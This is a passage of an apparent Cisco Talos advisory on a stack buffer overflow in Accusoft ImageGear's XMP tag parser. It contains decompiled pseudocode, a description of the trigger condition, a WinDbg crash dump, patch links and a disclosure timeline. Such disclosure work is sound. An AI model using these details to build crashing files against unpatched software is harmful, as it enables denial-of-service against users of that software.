    LINE22    while (pcVar8 < pcVar9) {
    LINE23      cVar1 = *(char *)this->field10_0x1c;
    [...]
    LINE48      else if (cVar1 == '<') {
    [...]
    LINE91                      /* ---------------------------------------------------------------------------
    LINE92                          */
    LINE93        iVar5 = parseDelimiter(this,(char (*) [256])buffer_ovw);
    LINE94                      /* ---------------------------------------------------------------------------
    LINE95                          */
    [...]
    LINE161     this->field10_0x1c = this->field10_0x1c + 1;
    LINE162     pcVar8 = (char *)this->field10_0x1c;
    LINE163   }
    LINE165   security_check_cookie(stack_canary ^ (uint)&stack0xfffffffc);
    LINE166   return;
    LINE167 }
    

So this indicates to us that somehow the stack_canary declared at LINE14, which is initialized LINE16, has been overwritten along the flow of this function. After investigation, it appears the stack_canary is overwritten during the call to the parseDelimiter at LINE93, which takes as a parameter the variable buffer_ovw declared at LINE13 just before the stack_canary.

Below is the parseDelimiter pseudo-code:

    LINE168 void __thiscall IGXMPXMLParser::parseDelimiter(IGXMPXMLParser *this,char (*buffer_ovw) [256])
    LINE169 {
    LINE170   bool bVar1;
    LINE171   int *piVar2;
    LINE172   char (*target_buffer) [256];
    LINE173   int index;
    LINE174   bool bVar3;
    LINE175   int local_410;
    LINE176   int local_40c;
    LINE177   char string_buffer [1024];
    LINE178   uint stack_cookie;
    LINE179   
    LINE180   stack_cookie = DAT_7435cea8 ^ (uint)&stack0xfffffffc;
    LINE181   index = 0;
    LINE182   bVar1 = false;
    LINE183   bVar3 = *(char *)this->field10_0x1c == '/';
    LINE184   if (bVar3) {
    LINE185     (*buffer_ovw)[0] = '/';
    LINE186     this->field10_0x1c = this->field10_0x1c + 1;
    LINE187   }
    LINE188   target_buffer = (char (*) [256])(*buffer_ovw + bVar3);
    LINE189   while (index < 256) {
    LINE190     switch(*(char *)this->field10_0x1c) {
    LINE191     case '\t':
    LINE192     case '\n':
    LINE193     case '\r':
    LINE194     case ' ':
    LINE195     case '/':
    LINE196     case '>':
    LINE197       *(char *)target_buffer = '\0';
    LINE198       this->field10_0x1c = this->field10_0x1c + -1;
    LINE199       bVar1 = true;
    LINE200       break;
    LINE201     default:
    LINE202       *(char *)target_buffer = *(char *)this->field10_0x1c;
    LINE203       target_buffer = (char (*) [256])((int)target_buffer + 1);
    LINE204       index = index + 1;
    LINE205     }
    LINE206     this->field10_0x1c = this->field10_0x1c + 1;
    LINE207     if (bVar1) {
    LINE208       security_check_cookie(stack_cookie ^ (uint)&stack0xfffffffc);
    LINE209       return;
    LINE210     }
    LINE211   }
    LINE212   if (this->field21_0x50 != 0) {
    LINE213     index = this->field31_0x78;
    LINE214     local_40c = this->field10_0x1c - (int)this->field2_0x8;
    LINE215     local_410 = 0;
    LINE216     if (0 < index) {
    LINE217       piVar2 = (int *)this->field30_0x74;
    LINE218       do {
    LINE219         if (local_40c < *piVar2) break;
    LINE220         local_410 = local_410 + 1;
    LINE221         piVar2 = piVar2 + 1;
    LINE222       } while (local_410 < index);
    LINE223     }
    LINE224     if (local_410 < index) {
    LINE225       local_40c = *(int *)((int)this->field30_0x74 + local_410 * 4) - local_40c;
    LINE226     }
    LINE227     else {
    LINE228       local_40c = 0;
    LINE229     }
    LINE230     if (this->field38_0x88 == 2) {
    LINE231       local_40c = local_40c * 2;
    LINE232     }
    LINE233     strncpy(string_buffer,"Tag name exceed max character count",0x400);
    LINE234     (*(code *)this->field21_0x50)
    LINE235               (this,"C:\\BuildAgent\\work\\76e9801d497051a9\\Source\\Common\\Inc_prv\\xmlparser.cpp"
    LINE236                ,0x12f,&local_410);
    LINE237   }
    LINE238   security_check_cookie(stack_cookie ^ (uint)&stack0xfffffffc);
    LINE239   return;
    LINE240 }
    

Looking through the parameter buffer_ovw, we can observe the code is impacting the table in two places: LINE185 and LINE188. In LINE185, we see it depends on the boolean variable bVar3, which is set to true when some specific char is found in LINE183. The side effect of this boolean check isthat it impacts the shift to the start of target_buffer LINE188, as it’s added to buffer_ovw by one byte.  
We observe then a while loop starting LINE189 with a hardcoded constant of 256, which is supposed to prevent the overflow of the destination buffer buffer_ovw.  
But the code is not taking into account the boolean positive result shift and overflows the buffer_ovw if the default case is observed for more than 256 bytes.

The condition to make this happen depends on the PSD file records contained, identified as XMP metadata.  
This leads to a denial-of-service caused by the security_check_cookie. However, depending on how the Imagegear SDK is employed in an application, this could also lead to leaking 1 byte from the canary.

**Crash Information**

    0:000> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
    
    FAULTING_IP: 
    kernel32!UnhandledExceptionFilter+5f
    76adffa1 cc              int     3
    
    EXCEPTION_RECORD:  711ae3e0 -- (.exr 0x711ae3e0)
    ExceptionAddress: 71089a04 (igCore19d!IG_mpi_page_set+0x0012d9d4)
       ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
      ExceptionFlags: 00000001
    NumberParameters: 1
       Parameter[0]: 00000002
    
    CONTEXT:  711ae430 -- (.cxr 0x711ae430;r)
    eax=00000000 ebx=029c0150 ecx=8a712c18 edx=00000100 esi=000000a1 edi=000039ac
    eip=71089a04 esp=0018f044 ebp=0018f150 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    igCore19d!IG_mpi_page_set+0x12d9d4:
    71089a04 8be5            mov     esp,ebp
    Last set context:
    eax=00000000 ebx=029c0150 ecx=8a712c18 edx=00000100 esi=000000a1 edi=000039ac
    eip=71089a04 esp=0018f044 ebp=0018f150 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    igCore19d!IG_mpi_page_set+0x12d9d4:
    71089a04 8be5            mov     esp,ebp
    Resetting default scope
    
    FAULTING_THREAD:  000008fc
    
    PROCESS_NAME:  Fuzzme.exe
    
    ERROR_CODE: (NTSTATUS) 0x80000003 - {EXCEPTION}  Breakpoint  A breakpoint has been reached.
    
    EXCEPTION_CODE: (HRESULT) 0x80000003 (2147483651) - One or more arguments are invalid
    
    EXCEPTION_PARAMETER1:  00000000
    
    NTGLOBALFLAG:  470
    
    APPLICATION_VERIFIER_FLAGS:  0
    
    APP:  fuzzme.exe
    
    ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre
    
    BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME
    
    PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN
    
    DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN
    
    LAST_CONTROL_TRANSFER:  from 7108950c to 71089a04
    
    STACK_TEXT:  
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0018f150 7108950c 029c0150 0018f1e8 029c0348 igCore19d!IG_mpi_page_set+0x12d9d4
    0018f16c 7108966f 029c765d 000039ac 00000001 igCore19d!IG_mpi_page_set+0x12d4dc
    0018f1b8 7109003d 0018fc54 029c0150 00000000 igCore19d!IG_mpi_page_set+0x12d63f
    0018f670 7104cd0b 0018fc54 1000001e 029c0348 igCore19d!IG_mpi_page_set+0x13400d
    0018f738 7104c242 0018fc54 1000001e 029c0098 igCore19d!IG_mpi_page_set+0xf0cdb
    0018f774 7104bcba 0018fc54 0018f79c 0018f7c4 igCore19d!IG_mpi_page_set+0xf0212
    0018fbcc 70f313d9 0018fc54 029c0060 00000001 igCore19d!IG_mpi_page_set+0xefc8a
    0018fc04 70f708d7 00000000 029c0060 0018fc54 igCore19d!IG_image_savelist_get+0xb29
    0018fe80 70f70239 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0018fea0 70f05757 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x14209
    0018fec0 00402219 00308230 0018fed4 00000001 igCore19d!IG_load_file+0x47
    0018fed8 00402524 00308230 0018ff10 003079a8 Fuzzme!fuzzme+0x19
    0018ff40 0040668d 00000005 003066a8 003079a8 Fuzzme!fuzzme+0x324
    0018ff88 76aa33ca 7efde000 0018ffd4 77d19ed2 Fuzzme!fuzzme+0x448d
    0018ff94 77d19ed2 7efde000 7741e483 00000000 kernel32!BaseThreadInitThunk+0xe
    0018ffd4 77d19ea5 00406715 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
    0018ffec 00000000 00406715 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b
    
    
    FOLLOWUP_IP: 
    igCore19d!IG_mpi_page_set+12d9d4
    71089a04 8be5            mov     esp,ebp
    
    SYMBOL_STACK_INDEX:  0
    
    SYMBOL_NAME:  igcore19d!IG_mpi_page_set+12d9d4
    
    FOLLOWUP_NAME:  MachineOwner
    
    MODULE_NAME: igCore19d
    
    IMAGE_NAME:  igCore19d.dll
    
    DEBUG_FLR_IMAGE_TIMESTAMP:  60aceda9
    
    STACK_COMMAND:  .cxr 0x711ae430 ; kb
    
    FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_80000003_igCore19d.dll!IG_mpi_page_set
    
    BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_MISSING_GSFRAME_igcore19d!IG_mpi_page_set+12d9d4
    
    ANALYSIS_SOURCE:  UM
    
    FAILURE_ID_HASH_STRING:  um:stack_buffer_overrun_80000003_igcore19d.dll!ig_mpi_page_set
    
    FAILURE_ID_HASH:  {e0459bbd-9052-42e3-75ad-df79bbfa6dcb}
    
    Followup: MachineOwner
    ---------
    

**Vendor Response**

ImageGear Pro v20.0 release

Windows: https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe Linux: https://download.accusoft.com/imagegear/pro/unix/ImageGear\_for\_C\_Cpp20.0.0-Linux64.tar.gz

Documentation Windows: http://help.accusoft.com/ImageGear/v20.0/Windows/DLL/webframe.html Linux: http://help.accusoft.com/ImageGear/v20.0/Linux/webframe.html

https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe

**Timeline**

2022-02-07 - Vendor disclosure  
2022-04-29 - Vendor patched  
2022-05-02 - Public Release  

Discovered by Emmanuel Tacheau of Cisco Talos.

Tag

#intel